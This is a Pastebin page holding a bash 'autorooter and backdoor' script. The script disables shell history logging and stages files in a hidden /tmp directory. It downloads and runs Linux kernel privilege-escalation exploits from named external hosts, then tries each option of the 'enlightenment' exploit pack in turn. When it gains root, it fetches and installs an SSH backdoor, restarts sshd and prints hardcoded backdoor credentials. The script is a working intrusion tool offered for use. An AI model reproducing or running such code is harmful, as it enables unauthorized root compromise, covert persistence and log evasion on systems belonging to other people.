Advertisement
coolproxies

backdoor

Aug 10th, 2017
17,380
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.79 KB | None | 0 0
  1. #!/bin/bash
  2. #Autorooter and backdoor bash-script
  3. #Hopefully this script will come to good use
  4. #Run n tell dat home, home, homeboy!!
  5. #by: ludwig @ SSTeam.info
  6. clear
  7.  
  8. #Killing logging
  9. unset HISTFILE
  10. unset SAVEFILE
  11. unset HISTSAVE
  12. history -n
  13. unset WATCH
  14. export HISTFILE=/dev/null
  15. echo "[+] Logging killed"
  16.  
  17. cd /tmp
  18. rm -rf .saved
  19. mkdir .saved
  20. cd .saved
  21. echo "[+] Our directory: `pwd`"
  22.  
  23. function root()
  24. {
  25. if [ `whoami` = root ]; then
  26. {
  27. echo "[+] uid=0 ;)"
  28. echo "[+] Installing backdoor"
  29. wget $backdoor 2>/dev/null
  30. tar xvf ssh.tgz >/dev/null
  31. rm -rf ssh.tgz
  32. cd .ssh
  33. chmod +x *
  34. ./setup
  35. /etc/init.d/sshd stop && /etc/init.d/sshd start #Sometimes with this backdoor init.d restart
  36. /etc/init.d/ssh stop && /etc/init.d/ssh start #Can be fucked up.
  37. echo "[+] You can now login with: root:h4ck=backd00r"
  38. exit 1
  39. }
  40. else
  41. {
  42. echo "[-] Still `id` :("
  43. }
  44. fi
  45. }
  46.  
  47. #URLs we're going to need
  48. exploit=http://shell.jails.se/~ludde/exploit #<2.6.19-exploit
  49. exploit2=http://shell.jails.se/~ludde/enlightenment.tgz #Exploit-pack
  50. exploit4=http://data.fuskbugg.se/dipdip/gcc #<2.6.37-exploit
  51. exploit5=http://data.fuskbugg.se/dipdip/exploi #<2.6.18 exploit
  52. backdoor=http://shell.jails.se/~ludde/ssh.tgz #A backdoor
  53.  
  54. function nogcc ()
  55. {
  56. if [ `uname -r | sed -r 's/2.6.([0-9]+).*/\1/'` -le 19 ]; then
  57. {
  58. echo "[+] Located kernel `uname -a`"
  59. if `uname -a | grep -q 2010`; then
  60. {
  61. echo "[+] Launching exploit"
  62. wget $exploit5 2>/dev/null
  63. chmod +x exploi
  64. ./exploi
  65. root
  66. }
  67. else
  68. {
  69. echo "[+] Launching exploit"
  70. wget $exploit 2>/dev/null
  71. chmod +x exploit
  72. ./exploit
  73. root
  74. }
  75. fi
  76. if [ `uname -r | sed -r 's/2.6.([0-9]+).*/\1/'` -gt 30 ]; then
  77. {
  78. echo "[+] Kernel `uname -a` located"
  79. wget $exploit4 2>/dev/null
  80. chmod +x gcc
  81. ./gcc
  82. root
  83. }
  84. fi
  85. }
  86. fi
  87. }
  88.  
  89. if [ ! /usr/bin/gcc ]; then
  90. {
  91. echo "[-] Couldn't find gcc.."
  92. echo "[-] Calling for nogcc function"
  93. sleep 1
  94. no gcc
  95. }
  96. fi
  97.  
  98. echo "[+] Other options failed. Trying enlightenment"
  99. wget $exploit2 2>/dev/null
  100. tar xvf enlightenment.tgz 2>/dev/null
  101. rm -rf enlightenment.tgz
  102. cd enlightenment
  103.  
  104. ./run_null_exploits.sh << EOF
  105. 6
  106. EOF
  107. root
  108. ./run_null_exploits.sh << EOF
  109. 5
  110. EOF
  111. root
  112. ./run_null_exploits.sh << EOF
  113. 4
  114. EOF
  115. root
  116. ./run_null_exploits.sh << EOF
  117. 3
  118. EOF
  119. root
  120. ./run_null_exploits.sh << EOF
  121. 2
  122. EOF
  123. root
  124. ./run_null_exploits.sh << EOF
  125. 0
  126. EOF
  127. root
  128. ./run_null_exploits.sh << EOF
  129. 1
  130. EOF
  131. root
  132.  
  133. echo "[-] Script failed. :("
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement